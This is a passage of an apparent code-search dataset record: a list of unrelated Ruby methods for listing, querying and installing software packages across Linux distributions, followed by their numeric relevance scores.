"def populate_ks_pkg_list(options)\n pkg_list = []\n if options['service'].to_s.match(/centos|fedora|rhel|sl_|oel/)\n if not options['service'].to_s.match(/fedora/)\n pkg_list.push(\"@base\")\n end\n pkg_list.push(\"@core\")\n if options['service'].to_s.match(/[a-z]_6/)\n pkg_list.push(\"@console-internet\")\n pkg_list.push(\"@system-admin-tools\")\n end\n if not options['service'].to_s.match(/sl_6|[a-z]_5|fedora/)\n pkg_list.push(\"@network-file-system-client\")\n end\n if options['service'].to_s.match(/centos_[6,7]|fedora|sl_[6,7]/)\n if not options['service'].to_s.match(/fedora_2[3-9]|centos_6/)\n pkg_list.push(\"redhat-lsb-core\")\n if not options['service'].to_s.match(/rhel_[6,7]|oel_[6,7]|centos_7/)\n pkg_list.push(\"augeas\")\n pkg_list.push(\"tk\")\n end\n end\n if not options['service'].to_s.match(/fedora|_[6,7,8]/)\n pkg_list.push(\"ruby\")\n pkg_list.push(\"ruby-irb\")\n pkg_list.push(\"rubygems\")\n pkg_list.push(\"ruby-rdoc\")\n pkg_list.push(\"ruby-devel\")\n end\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"augeas-libs\")\n pkg_list.push(\"ruby-libs\")\n end\n end\n if not options['service'].to_s.match(/fedora|el_[7,8]|centos_[6,7,8]/)\n pkg_list.push(\"grub\")\n pkg_list.push(\"libselinux-ruby\")\n end\n if options['service'].to_s.match(/el_[7,8]|centos_[7,8]/)\n pkg_list.push(\"iscsi-initiator-utils\")\n end\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"e2fsprogs\")\n pkg_list.push(\"lvm2\")\n end\n if not options['service'].to_s.match(/fedora/)\n pkg_list.push(\"kernel-devel\")\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"automake\")\n pkg_list.push(\"autoconf\")\n pkg_list.push(\"lftp\")\n pkg_list.push(\"avahi\")\n end\n end\n pkg_list.push(\"kernel-headers\")\n pkg_list.push(\"dos2unix\")\n pkg_list.push(\"unix2dos\")\n if not options['service'].to_s.match(/fedora_2[4-9]|centos_6/)\n pkg_list.push(\"zlib-devel\")\n end\n if not options['service'].to_s.match(/fedora/)\n if not options['service'].to_s.match(/centos_6/)\n pkg_list.push(\"libgpg-error-devel\")\n pkg_list.push(\"libxml2-devel\")\n pkg_list.push(\"libgcrypt-devel\")\n pkg_list.push(\"xz-devel\")\n pkg_list.push(\"libxslt-devel\")\n pkg_list.push(\"libstdc++-devel\")\n end\n if not options['service'].to_s.match(/rhel_5|fedora|centos_6/)\n pkg_list.push(\"perl-TermReadKey\")\n pkg_list.push(\"git\")\n pkg_list.push(\"perl-Git\")\n end\n pkg_list.push(\"gcc\")\n pkg_list.push(\"gcc-c++\")\n if not options['service'].to_s.match(/centos_|el_8/)\n pkg_list.push(\"dhcp\")\n end\n pkg_list.push(\"xinetd\")\n pkg_list.push(\"tftp-server\")\n end\n if not options['service'].to_s.match(/el_|centos_/)\n pkg_list.push(\"libgnome-keyring\")\n end\n if not options['service'].to_s.match(/rhel_5/)\n pkg_list.push(\"perl-Error\")\n end\n pkg_list.push(\"httpd\")\n if options['service'].to_s.match(/fedora/)\n pkg_list.push(\"net-tools\")\n pkg_list.push(\"bind-utils\")\n end\n if not options['service'].to_s.match(/fedora|el_8|centos_8/)\n pkg_list.push(\"ntp\")\n end\n pkg_list.push(\"rsync\")\n if options['service'].to_s.match(/sl_6/)\n pkg_list.push(\"-samba-client\")\n end\n end\n return pkg_list\nend",
"def packages\n Autoproj.warn_deprecated \"use #each_package instead\"\n each_package.to_a\n end",
"def pkginfo_from_pkg(package)\n raise RuntimeError, \"#{self.class} needs to overwrite pkginfo_from_pkg\"\n end",
"def active_packages(_packages=nil)\n _packages ||= self.packages\n _packages.select{|p| p.active == true}\n end",
"def differentiate(packages)\n named_groups = Hash.new{|h,k| h[k] = []}\n packages.each{|p| named_groups[p.name] << p }\n named_groups.each do |name, packages| \n if packages.length > 1\n packages.each{|p| p.name = \"#{p.name} (#{p.paths.first})\"} \n end\n end\n end",
"def versions_for_select(unit_member)\n static_options = [['Most Recent','']]\n pb = package_branch\n pb.bind_to_scope(unit_member)\n dynamic_options = pb.packages.map {|p| [p.version, p.id]}\n static_options + dynamic_options\n end",
"def packages\n @packages ||= []\n end",
"def packages\n @packages ||= []\n end",
"def set_package_info\n download_and_extract_package\n parse_package_description\n @package_hash = filter_into_package @package_desc\n @version_hash = filter_into_version @package_desc\n @author_hash = filter_into_author @package_desc[\"Author\"]\n @maintainer_hash = filter_into_author @package_desc[\"Maintainer\"]\n end",
"def supported_pkgs\n {\"rpm\"=>1, \"deb\"=>1}\nend",
"def packages_for_multiple_projects\n ::Packages::Package.for_projects(projects_visible_to_current_user)\n end",
"def layout_packages(validate = true)\n result = PackageSelection.new\n Autoproj.in_file(file) do\n normalized_layout.each_key do |pkg_or_set|\n weak =\n if (meta = metapackages[pkg_or_set])\n meta.weak_dependencies?\n end\n\n resolve_package_name(pkg_or_set).each do |pkg_type, pkg_name|\n result.select(\n pkg_or_set, pkg_name,\n osdep: (pkg_type == :osdeps),\n weak: weak\n )\n end\n rescue PackageNotFound => e\n raise e, \"#{pkg_or_set}, which is selected in the layout, \"\\\n \"is unknown: #{e.message}\", e.backtrace\n end\n end\n\n begin\n result.filter_excluded_and_ignored_packages(self)\n rescue ExcludedSelection => e\n if validate\n raise e, \"#{e.selection}, which is selected in the layout, cannot be built: #{e.message}\", e.backtrace\n end\n end\n result\n end",
"def package\n @options['package']\n end",
"def installed_packages()\n\t\t\tend",
"def installed_packages()\n\t\t\t\treturn(PackageList.new())\n\t\t\tend",
"def packages()\n\t\t\t\traise(PackageError, \"A full package list is not implemented on OpenBSD\")\n\t\t\tend",
"def installed_packages()\n\t\t\t\tpackages = PackageList.new()\n\t\t\t\tpackageregex = /^([^ ]+)-([^- ]+)\\s+(.*)$/\n\n\t\t\t\tinstalledpackageslist = `/usr/sbin/pkg_info`\n\t\t\t\tinstalledpackageslist.each_line() { |line|\n\t\t\t\t\tline.strip!()\n\t\t\t\t\tmatch = packageregex.match(line)\n\t\t\t\t\tif(match != nil)\n\t\t\t\t\t\tname = match[1]\n\t\t\t\t\t\tversion = match[2]\n\t\t\t\t\t\tdescription = match[3]\n\n\t\t\t\t\t\tpackages[name] = PackageInfo.new()\n\t\t\t\t\t\tpackages[name].name = name\n\t\t\t\t\t\tpackages[name].version = version\n\t\t\t\t\t\tpackages[name].description = description\n\t\t\t\t\tend\n\t\t\t\t}\n\n\t\t\t\treturn(packages)\n\t\t\tend",
"def packages()\n\t\t\tend",
"def listpackages\n packages = []\n\n @repository.categories.each do |category|\n Architecture.dataset(category).each do |entry|\n source = Architecture.new(entry[:architecture], entry[:component], entry[:suitename], category)\n source.files.each do |fullname|\n package = Package.new(fullname, entry[:suitename], entry[:component])\n packages << {\n :fullname => fullname,\n :category => category,\n :basename => File.basename(fullname),\n :controlfile => package.controlfile,\n :component => entry[:component],\n :suitename => entry[:suitename],\n :architecture => entry[:architecture]\n }\n end\n end\n if category.eql? \"stage\"\n Component.dataset(category).each do |entry|\n source = Component.new(entry[:component], entry[:suitename], category)\n source.files.each do |fullname|\n package = Package.new(fullname, entry[:suitename], entry[:component])\n packages << {\n :fullname => fullname,\n :category => category,\n :basename => File.basename(fullname),\n :controlfile => package.controlfile,\n :component => entry[:component],\n :suitename => entry[:suitename],\n :architecture => \"unknown\"\n }\n end\n end\n end\n end\n packages\n end",
"def packages()\n\t\t\t\treturn(PackageList.new())\n\t\t\tend",
"def import_selected_packages(selection, updated_packages, options = Hash.new)\n all_processed_packages = Set.new\n\n parallel_options, options = Kernel.filter_options options,\n parallel: ws.config.parallel_import_level\n\n # This is used in the ensure block, initialize as early as\n # possible\n executor = Concurrent::FixedThreadPool.new(parallel_options[:parallel], max_length: 0)\n\n options, import_options = Kernel.filter_options options,\n recursive: true,\n retry_count: nil\n\n ignore_errors = options[:ignore_errors]\n retry_count = options[:retry_count]\n manifest = ws.manifest\n\n selected_packages = selection.each_source_package_name.map do |pkg_name|\n manifest.find_autobuild_package(pkg_name)\n end.to_set\n\n # The reverse dependencies for the package tree. It is discovered as\n # we go on with the import\n #\n # It only contains strong dependencies. Optional dependencies are\n # not included, as we will use this only to take into account\n # package exclusion (and that does not affect optional dependencies)\n reverse_dependencies = Hash.new { |h, k| h[k] = Set.new }\n\n completion_queue = Queue.new\n pending_packages = Set.new\n # The set of all packages that are currently selected by +selection+\n all_processed_packages = Set.new\n interactive_imports = Array.new\n package_queue = selected_packages.to_a.sort_by(&:name)\n failures = Hash.new\n while failures.empty? || ignore_errors\n # Queue work for all packages in the queue\n package_queue.each do |pkg|\n # Remove packages that have already been processed\n next if all_processed_packages.include?(pkg)\n all_processed_packages << pkg\n\n if !pre_package_import(selection, manifest, pkg, reverse_dependencies)\n next\n elsif pkg.importer.interactive?\n interactive_imports << pkg\n next\n end\n\n pending_packages << pkg\n import_future = Concurrent::Future.new(executor: executor, args: [pkg]) do |import_pkg|\n ## COMPLETELY BYPASS RAKE HERE\n # The reason is that the ordering of import/prepare between\n # packages is not important BUT the ordering of import vs.\n # prepare in one package IS important: prepare is the method\n # that takes into account dependencies.\n if retry_count\n import_pkg.importer.retry_count = retry_count\n end\n import_pkg.import(import_options.merge(allow_interactive: false))\n end\n import_future.add_observer do |time, result, reason|\n completion_queue << [pkg, time, result, reason]\n end\n import_future.execute\n end\n package_queue.clear\n\n if completion_queue.empty? && pending_packages.empty?\n # We've nothing to process anymore ... process\n # interactive imports if there are some. Otherwise,\n # we're done\n if interactive_imports.empty?\n return all_processed_packages\n else\n interactive_imports.each do |pkg|\n begin\n result = pkg.import(import_options.merge(allow_interactive: true))\n rescue Exception => reason\n end\n completion_queue << [pkg, Time.now, result, reason]\n end\n interactive_imports.clear\n end\n end\n\n # And wait one to finish\n pkg, time, result, reason = completion_queue.pop\n pending_packages.delete(pkg)\n if reason\n if reason.kind_of?(Autobuild::InteractionRequired)\n interactive_imports << pkg\n else\n # One importer failed... terminate\n Autoproj.error \"import of #{pkg.name} failed\"\n if !reason.kind_of?(Interrupt)\n Autoproj.error \"#{reason}\"\n end\n failures[pkg] = reason\n end\n else\n if new_packages = post_package_import(selection, manifest, pkg, reverse_dependencies)\n # Excluded dependencies might have caused the package to be\n # excluded as well ... 
do not add any dependency to the\n # processing queue if it is the case\n if manifest.excluded?(pkg.name)\n selection.filter_excluded_and_ignored_packages(manifest)\n elsif options[:recursive]\n package_queue = new_packages.sort_by(&:name)\n end\n end\n end\n end\n\n if !failures.empty?\n raise ImportFailed, \"import of #{failures.size} packages failed: #{failures.keys.map(&:name).sort.join(\", \")}\"\n end\n\n all_processed_packages\n\n ensure\n if failures && !failures.empty? && !ignore_errors\n Autoproj.error \"waiting for pending import jobs to finish\"\n end\n if executor\n executor.shutdown\n executor.wait_for_termination\n end\n updated_packages.concat(all_processed_packages.find_all(&:updated?).map(&:name))\n end",
"def installed_packages()\n\t\t\t\tinstalledpackagelist = `#{@finkbin} list -i`\n\n\t\t\t\tinstalledpackages = PackageList.new()\n\t\t\t\tinstalledpackagelist.each_line() { |line|\n\t\t\t\t\tlinearr = line.split()\n\t\t\t\t\tinstalledpackages[linearr[1]] = PackageInfo.new()\n\t\t\t\t\tinstalledpackages[linearr[1]].name = linearr[1]\n\t\t\t\t\tinstalledpackages[linearr[1]].version = linearr[2]\n\t\t\t\t\tinstalledpackages[linearr[1]].description = linearr[3]\n\t\t\t\t\tinstalledpackages[linearr[1]].installed = true\n\t\t\t\t}\n\n\t\t\t\treturn(installedpackages)\n\t\t\tend",
"def list_packages\n res = []\n out = Aptly::runcmd \"aptly mirror show -with-packages #{@name.quote}\"\n Aptly::parse_indented_list out.lines\n end",
"def search_for_description pkgname, packages = []\n cache_key = \"description_package_#{pkgname.downcase}\"\n description_package = Rails.cache.fetch(cache_key, :expires_in => 12.hours) do\n if packages.blank?\n packages = Seeker.prepare_result(\"\\\"#{pkgname}\\\"\", nil, nil, nil, nil)\n packages = packages.reject {|p| p.first.type == 'ymp'}\n end\n packages.select {|p| p.name == pkgname}.each do |package|\n description_package = nil\n unless package.description.blank?\n description_package = package\n logger.info \"Found package info for #{pkgname} in: #{package.project}\"\n break\n end\n logger.error \"No package info for #{pkgname} in: #{package.project}\"\n end\n description_package\n end\n end",
"def package_information\n puts\n puts \"%30s%s\" % [\"Plugin information : \", @package.metadata[:name]]\n puts \"%30s%s\" % [\"-\" * 22, \"-\" * 22]\n puts \"%30s%s\" % [\"Plugin Type : \", @package.plugintype.capitalize]\n puts \"%30s%s\" % [\"Package Output Format : \", @package_type.upcase]\n puts \"%30s%s\" % [\"Version : \", @package.metadata[:version]]\n puts \"%30s%s\" % [\"Iteration : \", @package.iteration]\n puts \"%30s%s\" % [\"Vendor : \", @package.vendor]\n puts \"%30s%s\" % [\"Post Install Script : \", @package.postinstall] if @package.postinstall\n puts \"%30s%s\" % [\"Author : \", @package.metadata[:author]]\n puts \"%30s%s\" % [\"License : \", @package.metadata[:license]]\n puts \"%30s%s\" % [\"URL : \", @package.metadata[:url]]\n\n if @package.packagedata.size > 0\n @package.packagedata = @package.packagedata.select{|k, v| v != nil}\n @package.packagedata.each_with_index do |values, i|\n if i == 0\n puts \"%30s%s\" % [\"Identified Packages : \", values[0]]\n else\n puts \"%30s%s\" % [\" \", values[0]]\n end\n end\n end\n end",
"def [](packagename)\n\t\t\t\treturn(packages()[packagename])\n\t\t\tend",
"def kpkg_info(kpkg)\n info = /linux-image-((\\d+\\.\\d+\\.\\d+)-(\\d+)-(.*))/.match(kpkg)\n\n unless info\n raise \"#{kpkg} does not follow Debian kernel package naming conventions\"\n end\n\n # turn the matched info into a hash and return it\n Hash[[:uname_r, :kernel_version, :abi_version, :flavor].zip(info.captures)]\nend",
"def find_packages(name, constraint = nil)\n # implement inside child\n end",
"def run_package_for_specified(bundle_info)\n if $options[:buildAll]\n info 'Packaging all dependencies'\n\n $toPackageDeps = []\n\n all_dependencies.each do |dep|\n files = dep.getInstalledFiles\n\n $toPackageDeps.push dep.Name if files && !files.empty?\n end\n\n puts $toPackageDeps.to_s\n end\n\n package_dependencies $toPackageDeps, bundle_info\nend",
"def packages_for_a_single_project\n project.packages\n end",
"def query_package(pkg_name)\n @logger.info(\"Querying for #{pkg_name}\")\n @index[:packages].key?(pkg_name)\n end",
"def default_packages(*names)\n pkg_set = Autoproj.current_package_set\n clear_metapackage(pkg_set.name)\n metapackage(pkg_set.name, *names)\nend",
"def setpkg\n setupini = findini\n abort 'Error: Failed to find a path to setup.ini.' unless setupini.is_a?(String)\n abort \"Error: setup.ini is not readable!! #{setupini}\" unless File.readable?(setupini)\n\n File.open(setupini, File::RDONLY) do |fp|\n cur = ''\n\n fp.flock(File::LOCK_SH)\n while l = fp.gets\n case l\n when /^@/\n cur = l.sub(/^@\\s*/, '').strip\n @pkg[cur] = []\n when /^requires:/\n @pkg[cur] = l.sub(/^requires:\\s*/, '').split(' ').map {|v| v.strip }\n when /^sdesc:/\n @pkg_d[cur] = l.sub(/^sdesc:\\s*\"([^\"]+)\"/, '\\1').gsub(/\\\\(.)/, '\\1').strip\n when /^category:/\n @b_pkg << cur if l =~ /\\bBase\\b/\n @o_pkg << cur if l =~ /\\b_obsolete\\b/\n @p_pkg << cur if l =~ /\\b_PostInstallLast\\b/\n end\n end\n end\n end",
"def setpkg2\n abort \"Error: installed.db is not readable!! #{INSTALLDB}\" unless File.readable?(INSTALLDB)\n\n r_pkg = []\n\n File.open(INSTALLDB, File::RDONLY) do |fp|\n fp.flock(File::LOCK_SH)\n\n fp.gets # skip 1st line\n while l = fp.gets\n l = l.split(' ', 2)[0].strip\n\n if @pkg[l].nil?\n warn \"Warning: Package #{l} is marked as installed, but it is not listed in setup.ini.\"\n else\n r_pkg << @pkg[l]\n @i_pkg << l\n end\n end\n end\n\n @r_pkg = r_pkg.flatten\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def package_list(packages, version)\n packages[:base].to_a.join(' ') + ' ' + packages[version].to_a.join(' ')\n end",
"def each_package\n package_name_array.each_with_index do |package_name, i|\n candidate_version = candidate_version_array[i]\n current_version = current_version_array[i]\n magic_version = use_magic_version? ? magic_version_array[i] : current_version_array[i]\n new_version = new_version_array[i]\n yield package_name, new_version, current_version, candidate_version, magic_version\n end\n end",
"def package_list(packages, version)\n Array(packages[:base]).join(' ') + ' ' + Array(packages[version]).join(' ')\n end",
"def pkg_check(pkg_array)\n pkg_array.each do |pkg|\n @packages[\"#{pkg}\"].each_key do |k|\n\n dpkg_res = `dpkg -s #{k} >/dev/null 2>&1 && { printf \"success\"; } || { printf \"fail\";}`\n if \"#{dpkg_res}\".include? \"success\"\n @packages[\"#{pkg}\"][\"#{k}\"] = \"true\"\n end\n end\n end\n@packages.select{|k, _| pkg_array.include?(k)}\nend",
"def packages(*names)\n names.empty? ? @packages : @packages = names\n end",
"def check_pkg_info\n return false if options['package_url'].nil? ||\n options['package_name'].nil?\n true\nend",
"def packages\n JSON.parse(package_metadata_command).values.flatten\n rescue JSON::ParserError => e\n message = \"Licensed was unable to parse the output from 'pnpm licenses list'. JSON Error: #{e.message}\"\n raise Licensed::Sources::Source::Error, message\n end",
"def query\n self.class.newstylepkgoutput\n begin\n output = pkg(:list, \"-H\", @resource[:name])\n rescue Puppet::ExecutionFailure\n # pkg returns 1 if the package is not found.\n return {:ensure => :absent, :name => @resource[:name]}\n end\n\n hash = self.class.parse_line(output.chomp) || {:ensure => :absent, :name => @resource[:name]}\n hash\n end",
"def query\n r = exec_cmd(command(:pkg), 'list', '-Hv', @resource[:name])\n return {:ensure => :absent, :name => @resource[:name]} if r[:exit] != 0\n self.class.parse_line(r[:out])\n end",
"def each_package(&block)\n packages_by_name.each_value(&block)\n end",
"def package_info(package_name)\n # return the package hash if it's in the brew info hash\n return brew_info[package_name] if brew_info[package_name]\n\n # check each item in the hash to see if we were passed an alias\n brew_info.each_value do |p|\n return p if p[\"full_name\"] == package_name || p[\"aliases\"].include?(package_name)\n end\n\n {}\n end",
"def find_package_definition(name)\n packages[validate_package_name_argument(name, require_existing: false)]\n end",
"def find_package_by_name(name)\n @packages[name]\n end",
"def info(pkg)\n\t\t\tr={type: \"info\", arg: pkg}\n\t\t\tself.query(r).first\n\t\tend",
"def all_required_packages(selection, with_rock_release_prefix = false)\n raise RuntimeError, \"#{self.class} needs to overwrite all_required_packages\"\n end",
"def deps(pkg) # FIXME: \"*** PACKAGE MAY NOT BE DELETED *** \"\n if pkg.status != :available\n components = `#{@cmd} -n #{pkg.name}`.split(\"Requires:\\n\")\n if components.size > 1\n return components[1].strip\n else\n return \"[No depends]\"\n end\n else\n if File.exist?(File.expand_path(\"~/Library/Application Support/Guigna/pkgsrc/INDEX\"))\n # TODO: parse INDEX\n end\n \"[Not available]\"\n end\n end",
"def search_packages(pattern)\n packages = RailsPwnerer::Base.all_packages\n Hash[packages.select { |key, value|\n pattern.kind_of?(Regexp) ? (pattern =~ key) : key.index(pattern)\n }.map { |key, value|\n # apt-cache search sometimes leaves version numbers out\n # Update the cache with version numbers.\n if value.nil?\n info = RailsPwnerer::Base.package_info_hash(\n Kernel.`(\"apt-cache show #{key}\"))\n packages[key] = value = info['Version']\n end\n [key, value]\n }]\n end",
"def all_selected_osdep_packages(validate = true)\n default_packages(validate).all_selected_osdep_packages(self)\n end",
"def dependencies(pkg)\n pkg.resolve_optional_dependencies\n deps_rock_packages = pkg.dependencies.map do |pkg_name|\n debian_name(Autoproj.manifest.package(pkg_name).autobuild)\n end.sort\n\n pkg_osdeps = Autoproj.osdeps.resolve_os_dependencies(pkg.os_packages)\n # There are limitations regarding handling packages with native dependencies\n #\n # Currently gems need to converted into debs using gem2deb\n # These deps dependencies are updated here before uploading a package\n # \n # Generation of the debian packages from the gems can be done in postprocessing step\n # i.e. see convert_gems\n \n deps_osdeps_packages = []\n native_package_manager = Autoproj.osdeps.os_package_handler\n _, native_pkg_list = pkg_osdeps.find { |handler, _| handler == native_package_manager }\n\n deps_osdeps_packages += native_pkg_list if native_pkg_list\n\n # Update global list\n @osdeps += deps_osdeps_packages\n\n non_native_handlers = pkg_osdeps.collect do |handler, pkg_list|\n if handler != native_package_manager\n [handler, pkg_list]\n end\n end.compact\n\n non_native_handlers.each do |pkg_handler, pkg_list|\n # Convert native ruby gems package names to rock-xxx \n if pkg_handler.kind_of?(Autoproj::PackageManagers::GemManager)\n pkg_list.each do |name,version|\n @ruby_gems << [name,version]\n deps_osdeps_packages << debian_ruby_name(name)\n end\n else\n raise ArgumentError, \"cannot package #{pkg.name} as it has non-native dependencies (#{pkg_list}) -- #{pkg_handler.class} #{pkg_handler}\"\n end\n end\n\n # Remove duplicates\n @osdeps.uniq!\n @ruby_gems.uniq!\n\n # Return rock packages and osdeps\n [deps_rock_packages, deps_osdeps_packages]\n end",
"def package_names_for_targets\n package_names_for_targets = []\n target_version_array.each_with_index do |target_version, i|\n if !target_version.nil?\n package_name = package_name_array[i]\n package_names_for_targets.push(package_name)\n else\n package_names_for_targets.push(nil) if allow_nils?\n end\n end\n multipackage? ? package_names_for_targets : package_names_for_targets[0]\n end",
"def packages_missing_candidates\n @packages_missing_candidates ||=\n begin\n missing = []\n each_package do |package_name, new_version, current_version, candidate_version, magic_version|\n missing.push(package_name) if magic_version.nil? && candidate_version.nil?\n end\n missing\n end\n end",
"def get_variants\n return [] if is_pdc?\n get_variants_by_package.values.flatten.uniq\n end",
"def packages\n manifest.each_with_object({}) do |(src, package_name), hsh|\n next if src.nil? || src.empty?\n hsh[package_name] ||= []\n hsh[package_name] << File.join(Licensed::Git.repository_root, src)\n end\n end",
"def get_packages(adb_opts = {})\n packages = []\n run_adb_shell(\"pm list packages -f\", adb_opts) do |pout|\n pout.each do |line|\n @log.debug(\"{stdout} #{line}\") unless @log.nil?\n parts = line.split(\":\")\n if (parts.length > 1)\n info = parts[1].strip.split(\"=\")\n package = AndroidAdb::Package.new(info[1], info[0]);\n packages << package;\n end\n end\n end\n return packages\n end",
"def work_packages\n @work_packages ||= {\n '1' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(total: true, core: false) }.reject(&:empty?),\n '2' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(hard: true, core: false) }.reject(&:empty?),\n '3' => FacilitiesManagement::RM6232::WorkPackage.selectable.map { |work_package| work_package.supplier_services.where(soft: true, core: false) }.reject(&:empty?)\n }\n end",
"def current_package\n @current_package\n end",
"def index\n @package_items = @package.package_items\n end",
"def packages\n Dir[File.join($__HELLO_DIR__, 'packages/*/*.yml')]\n .map do |yml|\n info = YAML.load File.read yml\n info['dir'] = File.dirname yml if info\n info\n end\n .select {|p| p }\n .sort_by {|p| p['priority'] || 10 }\nend",
"def getdeps(pkg)\n deps = []\n @pkg.each {|k, v| deps << k if v.include?(pkg) }\n\n return deps\n end",
"def GetPackages\n ProbeKernel() if !@kernel_probed\n deep_copy(@kernel_packages)\n end",
"def package\n return @children['package'][:value]\n end",
"def autoinstPackages\n allpackages = []\n\n # the primary list of packages\n allpackages = Convert.convert(\n Builtins.union(allpackages, PackageAI.toinstall),\n :from => \"list\",\n :to => \"list <string>\"\n )\n\n # In autoinst mode, a kernel should not be available\n # in <packages>\n if Builtins.size(@kernel) == 0\n kernel_pkgs = Kernel.ComputePackages\n allpackages = Convert.convert(\n Builtins.union(allpackages, kernel_pkgs),\n :from => \"list\",\n :to => \"list <string>\"\n )\n else\n if Pkg.IsAvailable(@kernel)\n allpackages = Builtins.add(allpackages, @kernel)\n kernel_nongpl = Ops.add(@kernel, \"-nongpl\")\n\n if Pkg.IsAvailable(kernel_nongpl)\n allpackages = Builtins.add(allpackages, kernel_nongpl)\n end\n else\n Builtins.y2warning(\"%1 not available, using kernel-default\", @kernel)\n kernel_pkgs = Kernel.ComputePackages\n allpackages = Convert.convert(\n Builtins.union(allpackages, kernel_pkgs),\n :from => \"list\",\n :to => \"list <string>\"\n )\n end\n end\n\n deep_copy(allpackages)\n end",
"def packages_from_require(rpmdep)\n refresh\n @rpmdb.whatprovides(rpmdep)\n end",
"def metapackage(name, *packages)\n Autoproj.workspace.manifest.metapackage(name, *packages)\nend",
"def package_types\n case Ohai['platform_family']\n when 'debian'\n %w(deb)\n when 'fedora', 'rhel'\n %w(rpm)\n when 'aix'\n %w(bff)\n when 'solaris2'\n %w(solaris)\n when 'windows'\n %w(msi)\n when 'mac_os_x'\n %w(pkg mac_dmg)\n else\n %w(makeself)\n end\n end",
"def resolve_packages\n installation_manifest =\n Autoproj::InstallationManifest.from_workspace_root(ws.root_dir)\n installation_manifest.each_package.to_a +\n installation_manifest.each_package_set.to_a\n end",
"def explicitely_selected_in_layout?(package_name)\n package_name = package_name.to_str\n normalized_layout.has_key?(package_name)\n end",
"def find_packages\n declared_packages.collect do |package|\n guess = ::Albacore::PackageRepo.new(%w|./packages ./src/packages|).find_latest package.id\n debug \"#{name}: guess: #{guess} [albacore: project]\"\n guess\n end\n end",
"def parsepkg package, force_rhel = nil\n raise \"Can't parse package name '#{package}'\" unless /(?<pkgname>^.*?)-(?<ver>[0-9\\.]*\\d)[.-](?<pkginfo>.*)$/ =~ package\n\n info = { name: pkgname, version: ver }\n pkgparts = pkginfo.split /[.-]/\n case info[:format] = pkgparts.pop\n when 'rpm'\n info[:arch] = pkgparts.pop\n raise \"Architecture '#{info[:arch]}' is not supported\" unless ['x86_64','noarch'].include? info[:arch]\n if pkgparts.detect { |c| /^(?:rh)?el(\\d)(_.*)?$/ =~ c }\n info[:rhel] = $~[1]\n else\n raise \"Can't determine CentOS release for '#{package}'. Force with -c option\" unless force_rhel\n info[:rhel] = force_rhel\n end\n when 'gem'\n else\n raise \"Suffix #{info[:format]} is not a recognized package type\"\n end\n return info\nend",
"def update_for\n update_for_items.collect(&:package)\n end",
"def packages\n %w(dtach rtorrent)\nend",
"def package_types\n case platform_family\n when 'debian'\n %w(deb)\n when 'fedora', 'rhel'\n %w(rpm)\n when 'aix'\n %w(bff)\n when 'solaris2'\n %w(pkgmk)\n when 'windows'\n %w(msi)\n when 'mac_os_x'\n %w(mac_pkg mac_dmg)\n else\n %w(makeself)\n end\n end",
"def display_available_options\n output.puts\n if user_package.model_info.has_selected_model?\n output.puts \"Available Options: \"\n output.puts CarOptionList.available_options.to_s(\"\\n\")\n else\n output.puts \"You need to select a model before adding options!\"\n end\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def rpm_package_information\n super\n end",
"def parse_pkg fname\n if File.extname(fname) == @extension\n lines = IO.readlines fname\n lines.each do |l|\n begin\n break if l =~ JTools::CLS_DECL_REGEX # stop if we find the class header\n next if l.strip.start_with? \"/*\", \"*\", \"//\"\n if l =~ JTools::PKG_DCL_REGEX # if package declaration found\n pkg_name = l.gsub JTools::EXTR_PKG, \"\" # extract path\n return pkg_name\n end\n rescue ArgumentError => e\n puts \"Error matching line '#{l}' In #{fname}. \" + e.message\n end\n end\n puts \"Warning: #{File.basename fname} has no or no valid package\" +\n \" declaration. Adding to default package.\" if @verbose\n \"\" # if we found nothing -> default package\n else\n raise ArgumentError.new \"Error. #{fname} is no #{@extension} file.\"\n end\n end",
"def packages\n return @packages if @packages\n\n @packages = resolve_packages.map do |pkg|\n next if ignored?(pkg)\n\n package_set = pkg.kind_of? Autoproj::InstallationManifest::PackageSet\n pkg = pkg.to_h\n local_dir = if package_set\n pkg[:raw_local_dir]\n else\n pkg[:importdir] || pkg[:srcdir]\n end\n\n Autoproj::Daemon::PackageRepository.new(\n pkg[:name] || pkg[:package_set],\n pkg[:vcs],\n package_set: package_set,\n local_dir: local_dir,\n ws: ws\n )\n end.compact\n @packages\n end",
"def sword_accept_packagings\n Utility.find_elements_by_namespace_and_name(extensions, \"http://purl.org/net/sword/terms/\", \"acceptPackaging\")\n end",
"def read_facts_packages_installed(packages)\n packages_installed = {}\n packages.each do |package, opts|\n packages_installed[package] = check_package_installed(package, opts)\n end\n\n packages_installed\nend"
] | [
"0.68138766",
"0.66908056",
"0.66548544",
"0.6567489",
"0.64760077",
"0.64440465",
"0.63981324",
"0.6337504",
"0.63027155",
"0.6271943",
"0.62538314",
"0.62475944",
"0.6244942",
"0.6211936",
"0.6166513",
"0.6117742",
"0.6111971",
"0.60975456",
"0.6069746",
"0.60353863",
"0.60045165",
"0.59927934",
"0.5972722",
"0.5972722",
"0.59699005",
"0.59542847",
"0.59535986",
"0.5942275",
"0.59297407",
"0.59051764",
"0.58698225",
"0.5867019",
"0.5831778",
"0.58278817",
"0.5807138",
"0.579785",
"0.57819545",
"0.5779892",
"0.5773167",
"0.5764276",
"0.57524437",
"0.57362235",
"0.5729624",
"0.5725924",
"0.57181615",
"0.5717771",
"0.5713209",
"0.5706147",
"0.5700165",
"0.56852055",
"0.56709194",
"0.5655291",
"0.5654348",
"0.5615942",
"0.55884326",
"0.55782235",
"0.5575615",
"0.5565309",
"0.556158",
"0.55503577",
"0.55418587",
"0.55280304",
"0.5520276",
"0.55194664",
"0.55034167",
"0.5496237",
"0.5495223",
"0.5494863",
"0.54802585",
"0.5476949",
"0.54738307",
"0.5471911",
"0.54691225",
"0.5467565",
"0.5466296",
"0.5466171",
"0.54634184",
"0.5463127",
"0.54471743",
"0.54350865",
"0.5431615",
"0.5431125",
"0.5427744",
"0.54128236",
"0.54125595",
"0.54112816",
"0.54111576",
"0.54050446",
"0.5404401",
"0.54031676",
"0.5399543",
"0.5391054",
"0.53720427",
"0.53607625",
"0.535544",
"0.53545135",
"0.5350067",
"0.5338391",
"0.5329299",
"0.53283614"
] | 0.6541327 | 4 |
